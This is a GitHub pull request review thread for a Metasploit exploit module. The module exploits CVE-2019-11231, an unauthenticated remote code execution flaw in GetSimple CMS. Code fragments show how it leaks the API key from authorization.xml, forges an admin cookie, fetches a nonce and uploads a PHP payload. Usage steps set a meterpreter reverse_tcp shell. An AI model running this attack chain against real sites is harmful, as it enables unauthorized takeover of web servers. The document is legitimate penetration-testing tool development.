-
Notifications
You must be signed in to change notification settings - Fork 13.8k
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
CVE-2019-11231 exploit: GetSimple CMS Unauth RCE #11802
Conversation
…_unauth_code_exec.rb (removed parenthesis) Co-Authored-By: truerandom <masterofdisaster@ciencias.unam.mx>
…_unauth_code_exec.rb (removed parenthesis) Co-Authored-By: truerandom <masterofdisaster@ciencias.unam.mx>
…_unauth_code_exec.rb (removed parenthesis) Co-Authored-By: truerandom <masterofdisaster@ciencias.unam.mx>
…_unauth_code_exec.rb (removed parenthesis) Co-Authored-By: truerandom <masterofdisaster@ciencias.unam.mx>
'License' => MSF_LICENSE, | ||
'Author' => | ||
[ | ||
'truerandom (twitter.com/truerand0m) @ Khalifazo' # |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
URLs and twitter handlers are generally not permitted in module author metadata. Move any additional information to a trailing comment.
'truerandom (twitter.com/truerand0m) @ Khalifazo' # | |
'truerand0m' # Discovery, exploit and Metasploit |
], | ||
'References' => | ||
[ | ||
['CVE', '2019-11231'], |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Add all relevant references, such as https://ssd-disclosure.com/archives/3899/ssd-advisory-getcms-unauthenticated-remote-code-execution
'method' => 'GET', | ||
'uri' => normalize_uri(target_uri.path,'theme',fname), | ||
}) | ||
handler |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
This shouldn't be necessary.
handler |
username = get_user() | ||
cookie = gen_cookie(version,salt,username) | ||
nonce = get_nonce(cookie) | ||
fname = rand_text_alpha(rand(10)+6) + '.php' |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
fname = rand_text_alpha(rand(10)+6) + '.php' | |
fname = "#{rand_text_alpha(6..16).php" |
|
||
def exploit | ||
unless check == CheckCode::Vulnerable | ||
fail_with(Failure::NotVulnerable, 'It appears that the target is not vulnerable') |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
fail_with(Failure::NotVulnerable, 'It appears that the target is not vulnerable') | |
fail_with(Failure::NotVulnerable, 'It appears that the target is not vulnerable') |
fname = rand_text_alpha(rand(10)+6) + '.php' | ||
php = %Q|<?php #{payload.encoded} ?>| | ||
upload_file(cookie,nonce,fname,php) | ||
send_request_raw({ |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
This should work with send_request_cgi
, which is preferred.
send_request_raw({ | |
send_request_cgi({ |
handler | ||
end | ||
|
||
def check |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
def check
version = gscms_version
unless version
return CheckCode::Safe
end
vprint_status "GetSimpleCMS version #{version}"
unless vulnerable
return CheckCode::Detected
end
CheckCode::Vulnerable
end
end | ||
|
||
def vulnerable | ||
vulnerable = true |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
vulnerable
variable is used only once in this method, and is also a redefinition of the method name.
Remove this line, and modify the method to return true
.
vulnerable = true |
end | ||
|
||
def gscms_version | ||
if target['Version'] |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
This code branch appears to be unused.
'Name' => "GetSimpleCMS Unauthenticated RCE", | ||
'Description' => %q{ | ||
This module exploits a vulnerability found in GetSimpleCMS, | ||
which allows unauthenticated attackers to perform Remote Code Execution. |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Describe the attack path. ie, upload a PHP file, bypass auth by leaking API key, etc.
Corrections in: author metadata, references, removing handler, removing unused code branch and vulnerable variable, improve module description
Hi, i made the corrections |
@msjenkins-r7 test this please. |
generator = res.get_html_document.at( | ||
'//script[@type = "text/javascript"]/@src' | ||
) | ||
vers = generator.value.split('?v=').last.gsub(".","") |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
generator
could be nil
here, so please add a check before this line.
2.6.2 :010 > res = Nokogiri::HTML('<html><head><body>Some stuff</body></head></html>')
=> #<Nokogiri::HTML::Document:0x3ff1b50457f4 name="document" children=[#<Nokogiri::XML::DTD:0x3ff1b5045614 name="html">, #<Nokogiri::XML::Element:0x3ff1b50453bc name="html" children=[#<Nokogiri::XML::Element:0x3ff1b5045204 name="head">, #<Nokogiri::XML::Element:0x3ff1b5045038 name="body" children=[#<Nokogiri::XML::Text:0x3ff1b5044e80 "Some stuff">]>]>]>
2.6.2 :011 > res.at(
2.6.2 :012 > '//script[@type = "text/javascript"]/@src'
2.6.2 :013?> )
=> nil
2.6.2 :014 > vers = generator.value.split('?v=').last.gsub(".","")
Traceback (most recent call last):
4: from /Users/space/.rvm/rubies/ruby-2.6.2/bin/irb:23:in `<main>'
3: from /Users/space/.rvm/rubies/ruby-2.6.2/bin/irb:23:in `load'
2: from /Users/space/.rvm/rubies/ruby-2.6.2/lib/ruby/gems/2.6.0/gems/irb-1.0.0/exe/irb:11:in `<top (required)>'
1: from (irb):14
NameError (undefined local variable or method `generator' for main:Object)
2.6.2 :015 >
'uri' => uri | ||
) | ||
return unless res && res.code == 200 | ||
@salt = res.get_xml_document.at('apikey').text |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Please add a check to the value returned by at
before accessing it, as nil
can be returned.
'uri' => uri | ||
) | ||
return unless res && res.code == 200 | ||
@username = res.get_html_document.at('[text()*="xml"]').text.split('.xml').first |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Please add a check before accessing the value returned by at
. This line can cause a failure if the value being searched for is not found.
2.6.2 :001 > require 'nokogiri'
=> true
2.6.2 :002 > res = Nokogiri::HTML('<html><head><body>Some stuff</body></head></html>')
=> #<Nokogiri::HTML::Document:0x3ff1b4d0f404 name="document" children=[#<Nokogiri::XML::DTD:0x3ff1b4d0ed10 name="html">, #<Nokogiri::XML::Element:0x3ff1b4d0e52c name="html" children=[#<Nokogiri::XML::Element:0x3ff1b4d11da8 name="head">, #<Nokogiri::XML::Element:0x3ff1b4d10a20 name="body" children=[#<Nokogiri::XML::Text:0x3ff1b4d17f8c "Some stuff">]>]>]>
2.6.2 :003 > res.at('[text()*="xml"]').text.split('.xml').first
Traceback (most recent call last):
4: from /Users/space/.rvm/rubies/ruby-2.6.2/bin/irb:23:in `<main>'
3: from /Users/space/.rvm/rubies/ruby-2.6.2/bin/irb:23:in `load'
2: from /Users/space/.rvm/rubies/ruby-2.6.2/lib/ruby/gems/2.6.0/gems/irb-1.0.0/exe/irb:11:in `<top (required)>'
1: from (irb):3
NoMethodError (undefined method `text' for nil:NilClass)
2.6.2 :004 >
's' => 'Edit' | ||
} | ||
}) | ||
@nonce = res.get_html_document.at('//input[@id = "nonce"]/@value') |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
This line can return nil
, so please add a check on @nonce
so no error occurs when this will be accessed later in execution.
end | ||
|
||
def vulnerable | ||
uri = normalize_uri(target_uri.path, '/data/other/authorization.xml') |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
uri = normalize_uri(target_uri.path, '/data/other/authorization.xml') | |
uri = normalize_uri(target_uri.path, 'data', 'other', 'authorization.xml') |
) | ||
return unless res && res.code == 200 | ||
|
||
uri = normalize_uri(target_uri.path, '/data/users/') |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
uri = normalize_uri(target_uri.path, '/data/users/') | |
uri = normalize_uri(target_uri.path, 'data', 'users', '/') |
Hey @truerandom! Please add some documentation for your module. It's a markdown document that typically contains some information about what vulnerability the module exploits, installation of the vulnerable software, and module testing output. Here's a module doc template that can help you. |
Hey @truerandom, I submitted a PR to your branch that makes the changes I suggested above. Please let me know if that works and if there is anything I can help with! Thanks! |
add checks to `at` functions that could result in error
Added documentation in landing commit. Tested on version 3.3.15:
|
Release NotesThis adds an exploit module that utilizes an arbitrary file upload in GetSimple CMS version <= 3.3.15 to gain RCE. |
Hey @stevenseeley @void-in @bcoles @jmartin-r7 @space-r7 |
Hi this is a pull request for the module that exploits
CVE-2019-11231
(https://ssd-disclosure.com/archives/3899/ssd-advisory-getcms-unauthenticated-remote-code-execution)
Vulnerable application
GetSimple CMS http://get-simple.info
Vulnerable setup
configure cms at
http://localhost/getsimplecms/admin/install.php
Tested on
Apache/2.4.10 (Debian)
Verification
Launch metasploit and set the appropiate options:
msfconsole
use exploit/multi/http/getsimplecms_unauth_code_exec
set RHOST xxx
set TARGETURI /xxx/
set payload php/meterpreter/reverse_tcp
exploit
Demo
Compatible payloads
How it works
https://ssd-disclosure.com/archives/3899/ssd-advisory-getcms-unauthenticated-remote-code-execution